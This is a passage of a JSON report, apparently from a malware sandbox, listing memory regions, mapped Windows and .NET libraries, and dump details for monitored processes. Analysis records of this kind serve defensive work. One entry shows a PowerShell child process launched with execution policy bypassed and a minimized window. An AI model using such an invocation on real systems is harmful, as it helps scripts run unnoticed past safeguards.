], "ref_process_dump": { "ref_id": "proc_dump_239", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 31457280, "type": "region", "version": 1 }, "end_va": 31461375, "entry_point": 0, "filename": null, "id": "region_947", "name": "private_0x0000000001e00000", "norm_filename": null, "region_type": "private_memory", "start_va": 31457280, "timestamp": "00:00:48.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 31784960, "type": "region", "version": 1 }, "end_va": 31805439, "entry_point": 31784960, "filename": "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_948", "name": "sorttbls.nlp", "norm_filename": "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 31784960, "timestamp": "00:00:49.105", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 43122688, "type": "region", "version": 1 }, "end_va": 43388927, "entry_point": 43122688, "filename": "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_949", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 43122688, "timestamp": "00:00:49.106", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 31850496, "type": "region", "version": 1 }, "end_va": 31883263, "entry_point": 31850496, "filename": "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_952", "name": "microsoft.wsman.runtime.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 31850496, "timestamp": "00:00:49.737", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 31916032, "type": "region", "version": 1 }, "end_va": 31920127, "entry_point": 0, "filename": null, "id": "region_953", "name": "pagefile_0x0000000001e70000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31916032, "timestamp": "00:00:49.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 274432, "start_va": 77332480, "type": "region", "version": 1 }, "end_va": 77606911, "entry_point": 77332480, "filename": "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_954", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 77332480, "timestamp": "00:00:49.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 274432, "start_va": 1739194368, "type": "region", "version": 1 }, "end_va": 1739468799, "entry_point": 1739452476, "filename": "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_955", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 1739194368, "timestamp": "00:00:49.752", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 638976, "start_va": 1816002560, "type": "region", "version": 1 }, "end_va": 1816641535, "entry_point": 1816002560, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll", "id": "region_956", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 1816002560, "timestamp": "00:00:49.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 544768, "start_va": 1816657920, "type": "region", "version": 1 }, "end_va": 1817202687, "entry_point": 1816657920, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\ee28a075665b6bc23b6dae56903d431d\\Microsoft.WSMan.Management.ni.dll", "id": "region_957", "name": "microsoft.wsman.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\ee28a075665b6bc23b6dae56903d431d\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1816657920, "timestamp": "00:00:49.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 1817247744, "type": "region", "version": 1 }, "end_va": 1817399295, "entry_point": 1817247744, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll", "id": "region_958", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 1817247744, "timestamp": "00:00:49.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 307200, "start_va": 1817444352, "type": "region", "version": 1 }, "end_va": 1817751551, "entry_point": 1817444352, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4f68cd04686e5dc5a55070d112d44bdf\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll", "id": "region_959", "name": "microsoft.powershell.commands.diagnostics.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4f68cd04686e5dc5a55070d112d44bdf\\microsoft.powershell.commands.diagnostics.ni.dll", "region_type": "memory_mapped_file", "start_va": 1817444352, "timestamp": "00:00:49.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2314240, "start_va": 1817772032, "type": "region", "version": 1 }, "end_va": 1820086271, "entry_point": 1817772032, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll", "id": "region_960", "name": "system.core.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 1817772032, "timestamp": "00:00:49.779", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 32509951, "entry_point": 0, "filename": null, "id": "region_961", "name": "pagefile_0x0000000001f00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32505856, "timestamp": "00:00:50.516", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1614020608, "type": "region", "version": 1 }, "end_va": 1614053375, "entry_point": 1614020608, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll", "id": "region_962", "name": "culture.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll", "region_type": "memory_mapped_file", "start_va": 1614020608, "timestamp": "00:00:50.516", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 1813250048, "type": "region", "version": 1 }, "end_va": 1813434367, "entry_point": 1813250048, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\8ce205027e30804d1b2deaffa0582735\\Microsoft.PowerShell.Security.ni.dll", "id": "region_963", "name": "microsoft.powershell.security.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\8ce205027e30804d1b2deaffa0582735\\microsoft.powershell.security.ni.dll", "region_type": "memory_mapped_file", "start_va": 1813250048, "timestamp": "00:00:50.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 798720, "start_va": 1813446656, "type": "region", "version": 1 }, "end_va": 1814245375, "entry_point": 1813446656, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\8df695fb80187f65208d87229e81e8a2\\Microsoft.PowerShell.Commands.Management.ni.dll", "id": "region_964", "name": "microsoft.powershell.commands.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\8df695fb80187f65208d87229e81e8a2\\microsoft.powershell.commands.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1813446656, "timestamp": "00:00:50.535", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -ExecutionPolicy bypass -noprofile -windowstyle minimized -command", "filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_6", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 6, "origin_monitor_id": 5, "ref_parent_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000006-region_00001037-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_276", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1037", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:55.871", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001038-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_277", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1038", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:55.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1039", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:00:55.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_1040", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:00:55.875", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_1041", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:00:55.875", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001042-addr_0x00000000000f0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_278", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_1042", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:55.875", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001043-addr_0x00000000001e0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_279", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 2228223, "entry_point": 0, "filename": null, "id": "region_1043", "name": "private_0x00000000001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1966080, "timestamp": "00:00:55.876", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 466944, "start_va": 563412992, "type": "region", "version": 1 }, "end_va": 563879935, "entry_point": 563442531, "filename": "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_1044", "name": "powershell.exe", "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 563412992, "timestamp": "00:00:55.876", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1045", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:00:55.876", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1046", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:00:55.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1047", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:00:55.878", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001048-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_280", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1048", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:00:55.878", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001049-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_281", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1049", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:00:55.878", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001050-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_282", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1050", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:00:55.879", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1051", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:55.879", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001052-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_283", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1052", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:55.880", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1053", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:00:55.880", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001054-addr_0x0000000000390000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_284", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 4259839, "entry_point": 0, "filename": null, "id": "region_1054", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:00:55.892", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1055", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:00:55.892", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1056", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:00:55.893", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1057", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:00:55.893", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001058-addr_0x00000000774a0000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_285", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_1058", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:00:55.894", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001059-addr_0x00000000775a0000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_286", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_1059", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:00:55.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1060", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:55.912", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1061", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:55.912", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1062", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:00:55.912", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001063-addr_0x0000000000170000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_287", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1572863, "entry_point": 0, "filename": null, "id": "region_1063", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:00:55.913", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001064-addr_0x0000000000580000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_288", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 6815743, "entry_point": 0, "filename": null, "id": "region_1064", "name": "private_0x0000000000580000", "norm_filename": null, "region_type": "private_memory", "start_va": 5767168, "timestamp": "00:00:55.919", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1941241856, "type": "region", "version": 1 }, "end_va": 1941323775, "entry_point": 1941249449, "filename": "\\Windows\\SysWOW64\\atl.dll", "id": "region_1065", "name": "atl.dll", "norm_filename": "c:\\windows\\syswow64\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1941241856, "timestamp": "00:00:55.919", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1948450816, "type": "region", "version": 1 }, "end_va": 1948753919, "entry_point": 1948462676, "filename": "\\Windows\\SysWOW64\\mscoree.dll", "id": "region_1066", "name": "mscoree.dll", "norm_filename": "c:\\windows\\syswow64\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 1948450816, "timestamp": "00:00:55.921", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1067", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:00:55.922", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1068", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:00:55.922", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1069", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:00:55.923", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1070", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:00:55.924", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": 